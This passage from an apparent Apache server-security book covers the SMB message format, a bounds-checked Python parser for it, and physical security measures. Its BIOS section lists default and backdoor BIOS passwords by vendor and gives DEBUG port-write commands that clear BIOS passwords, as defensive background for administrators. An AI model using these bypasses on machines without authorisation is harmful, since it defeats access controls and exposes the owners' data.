WORD smb_err;       (error code) 
BYTE smb_flg;       (flags) 
WORD smb_flg2;      (flags) 
WORD smb_res[6];    (reserved for future) 
WORD smb_tid;       (authenticated resource identifier) 
WORD smb_pid;       (caller's process id) 
WORD smb_uid;       (authenticated user id) 
WORD smb_mid;       (multiplex id) 
BYTE smb_wct;       (count of 16-bit words that follow) 
WORD smb_vwv[];     (variable number of 16-bit words) 
WORD smb_bcc;       (byte count) 
BYTE smb_buf[];     (variable number of bytes) 
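The fixed part of that structure is 32 bytes, and everything after smb_wct is sized by the two length fields the client supplies (smb_wct and smb_bcc); a parser that trusts those counts without checking them against the real message length reads past its buffer. The following added example (not code from the book or any SMB implementation) unpacks the layout above with the standard library's struct module and rejects messages whose counts exceed what was received. The message is built with the block's own helper and is a constructed sample; the command value 0x72 is taken from the CIFS specification's Negotiate Protocol command, which this page does not list.

```python
"""Parse the SMB message layout shown above, bounds-checking its length fields.

Added example; the sample message is constructed, and 0x72 (Negotiate Protocol)
is an assumed command code from the CIFS specification, not from this page.
"""
import struct
from typing import Any, Dict, List

SMB_MAGIC = b"\xffSMB"
# smb_idf[4] com rcls reh err flg flg2 res[6] tid pid uid mid  (little-endian, 32 bytes)
HEADER_FMT = "<4sBBBHBH12sHHHH"
HEADER_LEN = struct.calcsize(HEADER_FMT)
SMB_COM_NEGOTIATE = 0x72   # assumed value from the CIFS specification


class SmbParseError(ValueError):
    """Raised when a message is truncated or its counts disagree with its size."""


def parse_smb_message(data: bytes) -> Dict[str, Any]:
    """Split a raw message into header fields, parameter words and data buffer."""
    if len(data) < HEADER_LEN + 1 + 2:       # header + smb_wct + smb_bcc at minimum
        raise SmbParseError("message shorter than a minimal SMB message")
    (idf, com, rcls, reh, err, flg, flg2, _res,
     tid, pid, uid, mid) = struct.unpack_from(HEADER_FMT, data, 0)
    if idf != SMB_MAGIC:
        raise SmbParseError("missing 0xFF 'SMB' identifier")
    off = HEADER_LEN
    wct = data[off]                           # smb_wct: number of 16-bit words
    off += 1
    if len(data) < off + 2 * wct + 2:         # words plus the smb_bcc that follows
        raise SmbParseError("word count exceeds message length")
    words: List[int] = list(struct.unpack_from("<%dH" % wct, data, off))
    off += 2 * wct
    bcc = struct.unpack_from("<H", data, off)[0]   # smb_bcc: length of smb_buf
    off += 2
    if len(data) < off + bcc:
        raise SmbParseError("byte count exceeds message length")
    return {
        "command": com, "error_class": rcls, "error_code": err,
        "flags": flg, "flags2": flg2,
        "tid": tid, "pid": pid, "uid": uid, "mid": mid,
        "words": words, "byte_count": bcc, "buffer": data[off:off + bcc],
        "trailing_bytes": len(data) - (off + bcc),
    }


def is_well_formed(data: bytes) -> bool:
    """True when the message parses cleanly; use as a cheap pre-filter."""
    try:
        parse_smb_message(data)
    except SmbParseError:
        return False
    return True


def build_smb_message(com: int, tid: int, pid: int, uid: int, mid: int,
                      words: List[int], buf: bytes) -> bytes:
    """Assemble a message in the same layout (used here only to construct input)."""
    header = struct.pack(HEADER_FMT, SMB_MAGIC, com, 0, 0, 0, 0, 0, b"\0" * 12,
                         tid, pid, uid, mid)
    params = struct.pack("<B%dH" % len(words), len(words), *words)
    return header + params + struct.pack("<H", len(buf)) + buf


# Constructed sample: a Negotiate Protocol request offering one dialect string.
SAMPLE_NEGOTIATE = build_smb_message(SMB_COM_NEGOTIATE, 0, 0x1234, 0, 1,
                                     [], b"\x02NT LM 0.12\x00")

if __name__ == "__main__":
    parsed = parse_smb_message(SAMPLE_NEGOTIATE)
    print("command=0x%02x pid=0x%04x bcc=%d buf=%r" % (
        parsed["command"], parsed["pid"], parsed["byte_count"], parsed["buffer"]))
```

The two length checks are the point: both smb_wct and smb_bcc arrive from the peer, so each is compared with the bytes actually present before any slice is taken, and a message that claims more data than it carries is rejected rather than partially parsed.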


Typical SMB commands and requests include the following: 

• CHECK PATH 
• CLOSE FILE 
• CLOSE PRINT FILE 
• CREATE DIRECTORY 
• CREATE FILE 
• CREATE PRINT FILE 
• CREATE TEMPORARY FILE 
• DELETE DIRECTORY 
• DELETE FILE 
• FILE SEARCH 
• FLUSH FILE 
• GET FILE ATTRIBUTES 
• GET SERVER ATTRIBUTES 
• LOCK RECORD 
• MAKE NEW FILE 
• NEGOTIATE PROTOCOL 
• OPEN FILE 
• PROCESS EXIT 
• READ 
• RENAME FILE 
• SEEK 
• SET FILE ATTRIBUTES 
• TREE CONNECT 
• TREE DISCONNECT 
• UNLOCK RECORD 
• WRITE 
• WRITE PRINT FILE 


As you can quickly see from the preceding command list, SMB is different from other 
protocols. Most of the protocols discussed in this chapter don’t actually operate 
directly on data per se, nor do they allow others to do so (or at least, not via a 
simple, one-call request). Instead, they merely transport it. SMB, on the other hand, 
offers a client interesting possibilities, and any security hole in SMB could 
immediately threaten a wide variety of resources on the target. 
Has SMB ever been proven vulnerable to attack? Absolutely. Some examples: 


• In May 2000, independent researchers showed that SMB was vulnerable to 
electronic eavesdropping. Learn more at 
http://www.securityfocus.com/templates/archive.pike?list=100&mid=76082. 

• L0phtCrack, a popular password cracking utility, is capable of capturing SMB 
packets, and thus capturing passwords. Learn more at http://www.l0pht.com. 

• In April 1997, Paul Ashton demonstrated that one could alter an SMB client to 
spoof a legitimate user, and thus gain unauthorized access to the targeted 
server’s file system. To learn more, go to 
http://www.securityfocus.com/vdb/bottom.html?vid=233&_ref=1683130491. 


In fact, SMB vulnerabilities crop up periodically, but this happens no more 
frequently than it does with other protocols. The latest emerged in June 2000. 
Researchers found that an improperly formed DCE/RPC request wrapped in an SMB write 
request would crash Windows NT 4.0 and Windows 2000 machines, causing a 
denial-of-service condition. However, these issues aren’t critical. 


The most advanced and recent SMB implementation is the Common Internet File 
System (CIFS). 


NOTE 
To obtain early CIFS specifications and documentation, visit Microsoft’s CIFS FTP site. The 
material there is definitely dated, but arguably provides some of the most complete CIFS 
documentation. Find it at ftp://ftp.microsoft.com/developr/drg/CIFS/. 








Summary 


This chapter highlighted what risks you'll face. Your best defense against these risks 
is to carefully plan your Web host before you release it into the general population, 
and thereafter keep your patches current. The next chapter will focus on doing 
precisely that: implementing baseline security procedures when you first establish 
your Web host. 
your host, generally. In this short chapter, we’ll race 
through the following issues: 


• Physical security concepts 
• Server location and access 
• Network topology 
• BIOS and console passwords 
• Media and boot security 
• Biometric access controls 
• Anti-theft devices 


Physical Security Concepts 


Your Apache system will face many threats, but of these, physical threats loom 
largest. This is because when someone has physical access, they can damage 
portions of your system and information infrastructure that remote attackers 
cannot reach. 


The usual suspects: 

• Malicious local users 
• Disgruntled employees 
• Vandals or thieves 
When administrators contemplate physical security, they typically think in purely 
catastrophic terms, mulling accidents, disasters, and theft. This is sensible, because 
all three are legitimate threats. However, catastrophes are worst-case scenarios from 
which a system cannot recover. Many less-than-catastrophic physical security 
breaches pose dangers not so obvious, and new administrators often overlook them. 


Indeed, many physical security breaches leave no evidence trail. To appreciate this, 
think now of the machines you use in the normal course of business. These are 
likely located in your office or home. Each day, you boot these machines or login 
assuming that in your absence, they sat quiet and undisturbed. What if they didn’t? 


What if, while you grabbed lunch, someone logged in and perused your files? Would 
you know it? This unpleasant scenario provokes suspicion, and rightly so. You, like 
most users, no doubt store sensitive data on your system. You’d hardly want others 
rifling through it. Let’s run through a few pointers on how to prevent this. 


Server Location and Physical Access 


The two cardinal points are where your server is housed, and who has physical access 
to it. Security specialists have long held that if malicious users have physical access, 
security controls are pointless. Is this true? Absolutely. Nearly all computer systems 
are vulnerable to onsite attack. 


Attack in this sense can mean many things. For example, what if you gave a malicious 
user ten seconds alone with your servers? Could he, within that timeframe, do 
anything substantial? Certainly. He could perform brutish denial-of-service attacks 
merely by disconnecting wires, unplugging network hardware, or rebooting your 
servers. 


But these acts are rare in office settings. Instead, concern yourself chiefly with 
authorized local users. Experts estimate that insiders initiate 65%-80% of all serious 
intrusions, and with good reason: Insiders often possess information and physical 
access that outsiders do not. 


But that’s not the only advantage insiders have. Trust is another. In many companies, 
trusted employees roam freely, without fear of interrogation. After all, they’re 
supposed to be onsite. So, how do you protect your system from the enemy within? 
Government agencies and Internet service providers favor establishing a network 
operations center (NOC), and enforcing strict policies on who can access it. 


A network operations center is a restricted area that houses your servers. Here, you 
typically bolt your servers down, fasten them to racks, or otherwise secure them, 
along with other essential hardware. 


Ideally, few people should have access to your NOC. Those who do should have 
keys. One method is to use card keys that restrict even authorized users to certain 
times of day. Finally, consider keeping a log of when personnel enter and leave. 
Also, establish your NOC with these points in mind: 


• Nest it inside other office space, away from the public, preferably not on the 
ground floor. 

• Passageways leading to it should be solid—no glass doors. 

• Doors should have metal shielding, from the lock casing to the surrounding 
frame. This stops intruders from tampering with the lock’s sliding bolt. 

• Consider closed-circuit TV. 


Network Topology 


Network topology refers to your network’s layout, or how you link its components 
together. Network topology determines hardware links and how data flows across 
them, and thus has security implications. 


When choosing a topology, consider these risks: 


• The single point of failure—A central point (a hub, wire, router, switch) on which 
one or more network devices rely. When this central point fails, the system can 
lose network connectivity, and your site will be down. Every network has one 
single point of failure, and some have more than one. Your aim is to minimize 
the damage a network outage can cause, and different topologies pose different 
limitations in this regard. 

• Susceptibility to electronic eavesdropping—Electronic eavesdropping is where 
attackers surreptitiously capture network traffic. All topologies are vulnerable, 
but some topologies offer greater security than others. 

• Fault tolerance—In this context, this is your network’s capability to survive 
isolated failures. That is, if one, two, or five workstations fail, will remaining 
workstations continue to operate? If your network is fault tolerant, the answer 
is yes. 


Unless you have reasons not to, choose star topology, and implement it with hubs, 
switches, or routers that support encryption, access passwords, and administrative 
authentication. Also, run your wire through the walls, instead of exposing it where 
others can physically access it. Finally, reduce your Web system’s complexity 
whenever possible. 


NOTE 

For a good, quick primer on what various topologies look like, go to 
http://fcit.coedu.usf.edu/network/chap5/chap5.htm. 
For example, don’t distribute functions on a machine-by-machine basis unless you 
must. You’ve probably seen this before: one machine stores images, another stores 
CGI, another stores bare content. A complete denial of service isn’t necessary to 
discourage visitors; a partial denial of service can, too. 


Suppose that your developers build dynamic pages with media and logic housed on 
many different machines. What happens if one of those machines dies? You’ve seen 
this when a page never paints because it’s waiting for images from other servers, or 
it’s trying to send a transactional log elsewhere, to another network. Users have no 
patience, and if your site offers commerce services, these failures can cost you dearly. 
Systems parted out in the aforementioned manner are more likely to become 
partially disabled by malicious actors. 


BIOS and Console Passwords 


Nearly all computers today support BIOS passwords, console passwords, or both. 
BIOS passwords bar malicious users from accessing system setups, while console 
passwords protect workstation single-user modes. Either way, such password systems are 
at least marginally effective, and you should use them. 


Be sure to use a unique password; that is, one that’s different from other passwords 
you’ve used on the network. This ensures that even if attackers later crack your BIOS 
password, they can’t use it to crack other hosts, applications, or networks. 


How secure are BIOS passwords? Not very. They mainly foil newbie attackers. Today, 
most crackers know default and backdoor BIOS setup keys and passwords for most 
makes and models. Table 3.1 lists a few. 


TABLE 3.1 Well-Known BIOS Entry Keys and Passwords 

Manufacturer          Entry Key and/or Default Passwords 

American Megatrends   A.M.I., alfarome, AMI, ami, AMI SW, AMI!SW, AMI?SW, AMI_SW, AMIDECODE, 
                      bios, BIOS, cmos, efmuk1, EWITT RAND, HEWITT RAND, Oder, PASSWORD, 
                      and setup. 

Award                 award, 01322222, 589589, 589589, 589721, aLLy, aPAf, AW, Award, AWARD, 
                      AWARD PW, AWARD SW, Award SW, AWARD HW, AWARD PS, AWARD PW, AWARD_SW, 
                      awkward, CONCAT, djonet, LTHLT, j256, J262, j262, 322, J64, KDD, SER, 
                      SKY_FOX, Syxz, TTPTHA, ZAAADA, ZBAAACA, and ZJAAADC. 

Generic entry keys    Generic entry key combinations include ALT+?, ALT+S, ALT+ENTER, F1, F2, 
                      F3, CTRL+F1, CTRL+F3, CTRL+SHIFT+ESC, DEL, CTRL+ALT+INS, CTRL+ALT+S, 
                      ESC, and INS. 

Generic passwords     Generic default passwords (on various models) include admin, ALFAROME, 
                      BIOS, BIOSSTAR, biosstar, BIOSTAR, biostar, CMOS, CONDO, J64, PASS, 
                      PASSOFF, SETUP, and system. 

IBM Aptiva            Attackers can bypass the BIOS password by repeatedly depressing both 
                      mouse buttons on boot. 

Toshiba               Some models enable operators to bypass BIOS password protection by 
                      holding down the Shift button. 





Additionally, various prefabricated tools exist that either ferret out your BIOS 
password or “blast” it. (Blasting is where the attacker forces the password out of BIOS 
memory.) True, attackers must have these tools on hand when they crack your BIOS 
password (and few carry such tools in their back pocket). However, if Internet access 
is available, they can download such tools in seconds. 


Hence, you can’t rely on BIOS passwords as a serious line of defense. At best, they 
keep out casual users and give more experienced users pause—if only because it takes 
time to disable one. For machines located in well-lit, frequented areas, BIOS 
passwords are like shatter-resistant glass panes. True, an intruder can break them, but 
he’ll attract unwanted attention in the bargain. 


Note, however, that BIOS passwords will not defeat a determined attacker who has 
sufficient time alone. Machines already booted, or those unattended and solely 
protected by BIOS passwords, are vulnerable to several types of attacks. 


From a software standpoint, an attacker can disable BIOS passwords on any Windows 
machine that supports the DEBUG command. For example, suppose an attacker passed 
your machine now and saw Windows running. He could crank up DEBUG and try 
these commands: 


o 70 2E 
o 71 FF 
Q 


or these: 


o 70 17 
o 71 17 
Q 


or these: 


o 70 FF 
o 71 17 
Q 
These command strings send various byte values to ports 70 and 71, and clear BIOS 
passwords on most IBM compatibles. This is functionally equivalent to disabling the 
CMOS battery (another common physical attack), or switching BIOS jumper settings. 
Most motherboards, as a failsafe measure, have a jumper setting that voids the 
current BIOS password. This way, if you forget the password (or if someone changes 
it to an unknown value), you can still recover. 


Finally, most BIOS password algorithms have now been disclosed, making it easy to 
create a BIOS password cracker. For specific algorithms (and recipes for making such 
a tool), visit Eleventh Alliance’s BIOS password algorithm page, located at 
http://mirror.11a.nu/bios3.htm. 


CAUTION 

Reconsider setting BIOS and PROM passwords on servers that you later intend to 
remotely reboot. If these passwords are set and the machine reboots, it will hang at the 
password prompt, waiting for an answer. If the server provides critical services, this could 
have you hopping out of bed in the wee hours. 





Media and Boot Security 


Other seldom-addressed issues are boot media and drive accessibility. In settings that 
expose your machines to public use or access—such as in a university computer 
lab—you should disable floppy or CD-ROM boot access. Typically, you do this 
through system BIOS settings. 


In older systems, this isn’t an issue. In fact, it’s only in recent years that PC-based 
CD-ROM drive manufacturers have incorporated exotic boot options. (Workstation-based 
SCSI systems have been bootable for much longer.) Also, it was only recently 
that the majority of BIOS chips supported user-defined boot options. 


The reason for disabling boot options is this: If you don’t, anyone walking by can 
insert a boot disk or installation media and overwrite your drive, install software, or 
perhaps copy or read files on unprotected, non-NTFS, or poorly controlled Unix 
partitions. (Note also that if certain conditions are met, certain boot disks, if properly 
configured, can bypass some or all of your security measures.) 


How you disable these boot options varies. In some cases, the BIOS supports an 
implicit restriction, offering a Disable Floppy Boot or a Disable CD-ROM Boot 
feature, or both. In other cases, you must force a prohibition by specifying a 
particular boot sequence. 


The term boot sequence refers to what drives the system should search to find the 
bootable partition. Today, it’s common for BIOS chips to offer widely diverse boot 
sequence options, such as A, C, IDE@1, IDE@2, CDROM, OTHER, ALL, and so on. Many 
offer preset combinations, such as the following: 


• A, C, CDROM 
• C 
• C, A 
• CDROM, C, A 
• IDE@1, IDE@2, CDROM, C 


In situations where your BIOS does not offer an implicit restriction, choose C only (if 
that option is available). This forces the system to boot exclusively from the C drive. 
(In cases where the preset combinations permit you to exclude the CD-ROM, but 
force drive A in their sequences, toggle the Disable Floppy Seek on Boot option.) 


If you’re using SCSI drives, however, disabling boot features is more complicated. 
Here, you must review your SCSI adapter’s documentation. Only in rare cases can 
you control SCSI device boot control from the system BIOS. (Exceptions include 
situations where your SCSI is on-board, as in ASUS boards that have two—and 
sometimes four—SCSI connectors permanently installed on the motherboard.) 


Most SCSI adapters have their own BIOS, which permits you to set which drives are 
bootable. If you establish such settings, ensure that you either set the SCSI adapter’s 
administrative password (if it has one), or otherwise set your BIOS password. 
Standalone SCSI adapters kick in after the BIOS finishes its hardware diagnostic routines. 


Biometric Identification: A Historical Perspective 


Biometric identification is a new field, but its roots reach to ancient Egypt, when 
Pharaohs “signed” decrees with their thumbprint. In more recent times, Sir Francis 
Galton significantly advanced biometric identification when in 1893 he demonstrated 
that no two human’s fingerprints were alike, even in cases of identical twins. 


Sir Edward Henry exploited this when he developed the Henry System of fingerprint 
analysis, which, though waning, is still in use today. Henry’s system classified our 
fingertip ridges into loops of varying dimension. By analyzing these and establishing 
eight to sixteen points of comparison between samples, cops could positively 
identify criminals. 


NOTE

Fingerprint analysis is lauded as infallible, and in most cases it is—providing the target has fingerprints. Not everyone does. Some skin diseases distort fingerprints or deny them altogether. One example is epidermolysis, an inherited condition that mostly attacks unborn children. Epidermolysis victims sometimes have partial fingerprints, and sometimes none at all.

Until the mid-20th century, fingerprinting technology was surprisingly primitive. Obtaining and analyzing prints involved direct physical hand-to-ink impressions. Armed with these prints, which were stored on paper cards, criminologists made visual comparisons against samples from crime scenes.


More advanced technology has since surfaced. Today, the FBI stores 200 million 
fingerprints (29 million of which are unique) using the Fingerprint Image Compression 
Standard (FICS). FICS provides digital, space-efficient storage, and reduces terabytes of 
data to a fraction of their original size. And, as you might expect, computers now do 
most of the matching digitally. 


Contemporary digital fingerprinting technology is now inexpensive enough that vendors can incorporate it into PCs. Compaq, Sony, and many other manufacturers now offer fingerprint ID systems for PC models, and this trend is growing. Such systems capture your prints with a camera and use the resulting image to verify your identity.


Fingerprints are merely the beginning, though. In recent years, scientists have used 
several unique biological characteristics to reliably identify users, and of these, 
retinal patterns offer high assurance levels. 


The retina, which handles peripheral vision, is a thin optical tissue that converts 
light to electrical signals and then transmits them to your brain. Retinal scanners 
focus on two retinal layers. One, the outer layer, contains reflective, photoreceptive 
structures called cones and rods that process light. Beneath these, in the choroid 
layer, the retina houses complicated blood vessel systems. 


Retinal scans bombard your eye with infrared light, causing the cones and rods to reflect this light. The resulting reflection in turn reveals an imprint of your retina’s blood vessel patterns. These patterns, and in some cases, their digital or cryptographic values, constitute your retinal “fingerprint.”


Experts report that retinal scans are largely superior to fingerprints for identification purposes. Retinal patterns, for example, offer more points for matching than fingerprints do (anywhere from 700 to 4,200). For this reason, experts class retinal scanners as high biometrics, or biometric systems with exceptionally high degrees of assurance.


Indeed, only in rare cases are retinal scans insufficient, such as where users are blind, 
partially blind, or have cataracts. If anything, retinal scanners are too sensitive. They 
will sometimes bear disproportionately high false negative or rejection rates. That is, 
almost no chance exists that a retinal scanner will authenticate an unauthorized 
user, but it might reject a legitimate one. 


More recent technology focuses on voice patterns, but such systems can be unreliable. Instances can arise where voice recognition fails because the user has bronchitis, a cold, laryngitis, and so forth.
Using Biometric Access Control Devices


There are pros and cons to biometric access control. On the one hand, such controls offer extreme assurance. On the other, practical obstacles exist to instituting a wholly biometric approach.

First, when expanding biometric controls beyond the scope of your own workstation, you face privacy issues. For example, suppose you decide to institute biometric access controls enterprise-wide. Even if your employees sign a release, they could later sue for invasion of privacy, and perhaps prevail.


NOTE

Privacy concerns are more real than imagined. Experts say that retinal scans can detect drug abuse, hereditary disease, and even AIDS. Maintaining a retinal pattern database could therefore expose you to litigation. Fingerprints can reveal criminal convictions, too, which also constitute sensitive data. For a closer look at these techniques and their implications, check out A Primer on Biometric Technology, a PDF file located at http://www.rand.org/publications/MR/MR1237/MR1237.ch2.pdf.





Biometric access controls also have social implications. Even if your employees don’t 
voice it, they might resent such controls, and see them as a privacy violation. This 
could cultivate a hostile work environment, even if not overtly. 


Perhaps the strangest drawback of biometric access controls, though, is their sheer effectiveness, an issue to consider before deploying them. Most biometric systems perform at least simple logging, and thus create an incontrovertible record of who did what and when they did it. In lawsuits or criminal actions, your opponents could use your biometric system’s records against you, as the logs could deprive your personnel of plausible deniability.


Finally, biometric access controls are impractical in environments that extend beyond your local network. You can’t, for example, force remote users to use biometric devices, nor do all remote systems offer biometric support.


These issues aside, biometric access controls are excellent when used in-house, in 
close quarters among trusted co-workers. I recommend using them in your inner 
office on machines used to control and administrate your network. 


To learn more about biometric identification, check out these sites:

• Biometrics: Promising Frontiers for Emerging Identification Markets; MSU-CSE-00-2; Anil K. Jain, Lin Hong, and Sharath Pankanti; February 2000. http://www.cse.msu.edu/publications/tech/TR/MSU-CSE-00-2.ps.gz (PostScript and gzipped)

• Bio1 (http://www.bio1.com)—A resource for papers, statistics, standards, and studies.

• A View From Europe (http://www.dss.state.ct.us/digital/news11/bhsug11.htm)—An interview with Simon Davies that focuses on biometric privacy issues.

• Fight the Fingerprint (http://www.networkusa.org/fingerprint.shtml)—A group that sees a biometric future (and doesn’t like it). As its opening page explains: “We Stand Firmly Opposed to All Government Sanctioned Biometrics and Social Security Number Identification Schemes!”

• The BioAPI Consortium (http://www.bioapi.org/)—This group was established to help developers integrate biometric identification into existing standards and APIs.

• The Biometric Consortium (http://www.biometrics.org/)—“...the US Government’s focal point for research, development, test, evaluation, and application of biometric-based personal identification/verification technology...”


Anti-Theft Devices

Still another threat is theft, either of your entire system or its individual components. (Thieves need not steal your server. They can remove hard disk drives, memory, or expansion cards.) The following section lists various tools that can help you secure your system or these components.


Laptop Lockup
URL: http://www.laptoplockup.com/

Laptop Lockup prevents laptop theft using tamper-resistant steel cables and a brass padlock. These attach the laptop to a desk or table. The product supports a wide range of laptops, PowerBooks, and such.


FlexLok-50
URL: http://www.pioneerlock.com/

FlexLok-50 locks down workstations with 1/2-inch wire rope cabling that will resist bolt cutters, wire cutters, and hacksaws. Pioneer also offers bottom-plate systems that attach workstations to tables and desks.
Computer Guardian
URL: http://www.bigfish.co.uk/business/guardian/

Computer Guardian is a non-platform-dependent anti-theft system for PCs. It consists of an expansion card and software (on an external diskette). When the PC is moved or its components are tampered with, the system emits a loud siren likely to scare the thief and alert others.


PHAZER
URL: http://www.computersecurity.com/fiber/index.html

Do you have a large network? PHAZER is a fiber-optic security device that detects physical tampering. This monitoring system relies on a closed loop of fiber-optic wire. If the loop is broken, an alarm is generated. PHAZER is great for securing university computer labs or other large networks.


Unique Numbers, Marking, and Other Techniques 


Also consider taking steps to uniquely identify your system in case it’s stolen later. 
Thousands of computers disappear each year and victims rarely recover them, even 
after the police investigate. Some users fail to keep receipts, others fail to jot down 
serial numbers, and so on. Without taking these measures, after a criminal reformats 
the drives, you’d have a difficult time identifying your machine. 


Some safeguards that can help law enforcement include the following:

• Maintain meticulous records on all your hardware, including model and serial numbers. You’ll need these later. It’s often not enough that you can recognize your machine by its dings, cracks, and crevices. Police usually demand something more substantial, like serial numbers, bills of sale, and so on.

• Permanently mark your components with unique identifiers, using indelible ink, fluorescent paint, or UV paint/ink (which appears only under black light). Mark your motherboard, expansion cards, disk drives, the unit casing’s interior and exterior walls, and your monitor.


In addition, investigate proprietary marking or ID solutions. Two in particular are 
STOP and Accupage. 
STOP
URL: http://www.stoptheft.com/

STOP is a two-tiered theft prevention and identification system. First, an indelible chemical tattoo is etched into your hardware. This tattoo contains a message that identifies the equipment as stolen property. Over this, a special metal plate is fashioned that will adhere even under 800 pounds of pressure. Thieves can only defeat STOP by physically cutting away the tattooed, plated chassis.


Accupage
URL: http://www.accupage.com/

Accupage is a hardware system that embeds an indelible message containing the PC’s rightful owner’s identity into the PC. Police can later examine this message to determine ownership, and whether the PC has been stolen. Accupage is being integrated into some new laptops, but older desktop systems can be retrofitted.


Summary

Physical security is about common sense. Wherever possible, implement all security procedures prescribed by your hardware manufacturer. (In particular, watch for default passwords and such.) Also, if you’re currently using used network hardware, it’s worth tracking down supplemental documentation on the Internet. Older network hardware might harbor various flaws. Perhaps the best tip is this: Take every precaution to prevent unauthorized users from gaining physical access to your servers or network hardware.


4

Environmental Hazards: Apache and Your Operating System

IN THIS CHAPTER

• Apache and Your Underlying Operating System
• Environmental Risks Common to Unix
• Environmental Risks Common to Windows
• Other Environmental Risks

This chapter covers environmental hazards you'll face—hazards over which Apache often has little or no control.

Apache and Your Underlying Operating System

The number of operating systems on which Apache runs accounts for why Apache commands more than 55% of the Web server market. The list is long:

• AIX
• A/UX
• BeOS
• BS2000-OSD
• BSDI
• CygWin
• Darwin
• DGUX
• Digital Unix
• FreeBSD
• HP-UX
• IRIX
• Linux
• Mac OS X
• Mac OS X Server
• NetBSD
• NetWare
• OpenBSD
• OS/2
• OS/390
• OSF/1
• QNX
• Reliant Unix
• Rhapsody
• Sinix
• Solaris
• SunOS
• UnixWare
• Win32
• Windows NT, 2000, and XP


Taken alone, Apache has a good security record, especially compared to other Web 
servers. However, Apache can’t render an insecure underlying infrastructure secure. 
You must do this yourself, and one factor that will influence your risk level is your 
operating system. 


Choosing Your Operating System

Luckily, Apache’s modularity and portability offer you many options. Indeed, Apache needn’t drive your platform choice at all. Instead, you’ll choose—or should choose—your operating system based on other factors, including the following:

• The technical support you require
• How your Web server integrates with your overall enterprise
• The level of development you intend to undertake
• What functions your Web server will serve

Technical Support

Technical support: some folks need it, some folks don’t. Perhaps you're an Internet god or goddess who dreams in C, sockets, and SQL. Perhaps you're so deep into the Net that you construct raw packets at your terminal (and cackle wildly as you do it). If so, technical support means nothing to you. Not everyone is there yet, though.


Some organizations and businesses require technical support, and write it into any 
contracts they establish with vendors. More often than not, this is because such 
organizations are large and frequently lose employees. To ensure that their 
Webmaster—which they conceptualize more as an HR entity than a person—can 
pick up that phone, they’re willing to spend money. Such organizations usually rule 
out freebie operating systems that ship without support (OpenBSD, for example). 


Web Server Integration

Another factor to consider is the degree to which Apache will mesh into your overall enterprise. This can unfold in various ways:

• You're establishing a Web server merely to establish a Web presence. The Web site will carry nothing but promotional or support materials, and it’s a vanity site or a perfunctory measure. You’re doing it because you have to, and Apache will stand alone, as a sacrificial server, outside your firewall. This amounts to zero integration.

• You're establishing a Web server to keep your client base up-to-date on your enterprise’s activities. Part of this scenario is that you'd like seamless updating from an internal database to the Web server outside your firewall. However, your database people inside know little about Apache, FTP, SSH, and so on. They merely need an easy way to move the data over. This is moderate integration.

• You're establishing a Web server because you’re migrating your enterprise to an intranet. Therefore, the Web server is an integral part of your day-to-day business. It must tie in with custom-written applications in Java, ActiveX, COM, CORBA, XML or other technologies that your enterprise cannot survive without. This is deep integration.


Zero integration is not a reason to choose Linux just to save money. Rather, if your 
organization doesn’t use Linux inside, and no one inside knows Linux well, Linux is 
a terrible choice. You or your Webmaster must know the operating system on which 
Apache runs. True, you might not care whether the machine gets cracked because it 
doesn’t store irreplaceable data. However, it will cost your staff a fortune in time to 
reinstall every time attackers bring it down. 


Moderate integration invites the widest possibilities. Here, you could choose almost any operating system that your IS staff knows well. Most systems can now talk to multiple operating systems, even if only in degrees. For example, Windows supports AppleTalk and NFS. Similarly, Unix and Linux both offer Samba, and can therefore emulate a file server for Windows machines. So, if moderate integration is your gig, concentrate on price, technical support, or Apache’s function. There you'll find the answer.


Deep integration significantly narrows your options. Here you must choose an operating system that your development team knows well, and one that supports all technologies on which your enterprise relies. In other words, stick with a chosen operating system and implement it across the board. Doing otherwise will bring you grief.


Development Projects and Choice of Operating System

Chances are that if you chose Apache for serious development, there’s money in the mix. Some common scenarios:

• Your firm pitched a concept to a partner or venture capital outfit. They provided you with capital to produce a proof-of-concept system “in the small.” This means that the system you’re developing need only demonstrate a microcosmic version of what will later become an enterprise application. In other words, it’s a speculative venture.

• You're developing an application locally for an outfit elsewhere, and you’re trying—without costing yourself a fortune—to approximate their production environment.

• You're developing generic applications (CGI, for example) for general use by folks who will deploy these solutions in widely disparate environments.

• You're taking a business out of the Stone Age into the light. In the process, you're porting many of their core workflow patterns and daily tasks to either a partially or fully Web-enabled environment.


Here, only the first, second, and last scenarios narrow your options. In the first— 
where you’re developing a proof-of-concept system—you should adhere closely to 
what the “real” system will be. If you don’t, your partners won’t see (and you won’t 
be able to quickly implement) a ramp-up path to the finished product. Hence, if the 
tricked-out system demands SPARCstations, Solaris, Oracle Application Server, Oracle 
8i or 9, and JSP, then choose Linux, Apache, Tomcat, Jrun, JSP, and MySQL. It’s no 
cigar, but it’s close. 


Similarly, if you’re locally developing a system for deployment on remote servers, 
you’ve got to simulate the remote environment as closely as you can. If it’s OS/390, 
that’s a bummer, but you still have to do it. 
Finally, in the last scenario—where you're upgrading an entire enterprise—choose an operating system that approximates what they’ve been using. For example, perhaps they’ve been running a Novell shop. That’s a distinctive operating system, and if they weren’t running Windows on top of it, you’re stuck with Novell, as they’ll likely stick with it, too. No problem, though: Apache supports Novell.


Your Web Server’s Function 

Finally, you’ll consider your Web server’s function. What will it do? What data types 
will it support? Who will access it and why? All these issues, although less pressing 
than those mentioned previously, will drive your decision. 


Why So Much Talk About Operating Systems?

At this point, you have to be wondering: Why all the fuss about which operating system you choose? The answer is this: Operating systems are complicated environments, and even skilled users unwittingly conform to the infamous 80/20 rule:

Eighty percent of users use only twenty percent of the features of any given application or operating system.


For example, I’ve been using Microsoft Word since time immemorial. Indeed, I’ve 
been using Word so long that I’m an expert in WordBasic, an embedded macro 
language that Word offered, pre-VBA. Despite this, Word offers many other features 
I’ve never used and never will. I’m not even aware of many of them—and Word is 
merely one application. 


The box I used to write this book (at the moment I wrote this) stored 98,334 files. Of 
these, better than one third were application files, executables, or system libraries. Of 
that number, I’ve inspected about 10%. Of the remaining files, I know little about 
them, their contents, or even their function. 


Similarly, whatever operating system you choose, it’s sure to support several dozen protocols or services you don’t know well. Many of these will likely offer networked access to local services, and this will become even more prevalent as the years pass. Users want total network integration, where they can do anything, anywhere, at any time. Market forces are thus driving us closer and closer to an intricately wired world. Each such service or protocol increases the risk that crackers will gain unauthorized access to your Web host.


Beyond this, some operating systems have poor security, and there’s nothing Apache 
can do about it (such systems include Microsoft Windows 95, 98, ME, and so on). 
On these systems—which have little or no access control—Apache can reach into the 
file system and do whatever it likes. Under such conditions, if attackers do find a 
way to crack your Apache distribution, they’ll obtain carte blanche access, and if 
they want, destroy your file system and all data therein. 
For this reason, except on closed, private networks (or machines that will never see Internet access), rule out the following systems:

